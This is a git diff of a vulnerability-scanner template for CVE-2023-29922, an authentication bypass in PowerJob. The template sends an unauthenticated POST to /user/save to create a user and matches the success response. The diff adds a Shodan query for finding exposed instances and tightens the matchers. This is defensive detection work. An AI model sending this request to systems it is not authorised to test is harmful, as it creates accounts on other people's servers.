diff --git a/cves/2023/CVE-2023-29922.yaml b/cves/2023/CVE-2023-29922.yaml
index fc413febea..df698a737b 100644
--- a/cves/2023/CVE-2023-29922.yaml
+++ b/cves/2023/CVE-2023-29922.yaml
@@ -15,8 +15,9 @@ info:
     cve-id: CVE-2023-29922
     cwe-id: CWE-1188
   metadata:
-    fofa-query: app="PowerJob"
     verified: "true"
+    fofa-query: app="PowerJob"
+    shodan-query: html:"PowerJob"
   tags: cve,cve2023,auth-bypass,powerjob
 
 variables:
@@ -27,12 +28,6 @@ requests:
       - |
         POST /user/save HTTP/1.1
         Host: {{Hostname}}
-        Upgrade-Insecure-Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-        Accept-Encoding: gzip, deflate
-        Accept-Language: zh-CN,zh;q=0.9
-        Connection: close
         Content-Type: application/json
 
         {"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"}
@@ -42,7 +37,9 @@ requests:
       - type: word
         part: body
         words:
-          - "true"
+          - '"success":true'
+          - '"data":null'
+        condition: and
 
       - type: word
         part: header
@@ -51,4 +48,4 @@ requests:
 
       - type: status
         status:
-          - 200
+          - 200
\ No newline at end of file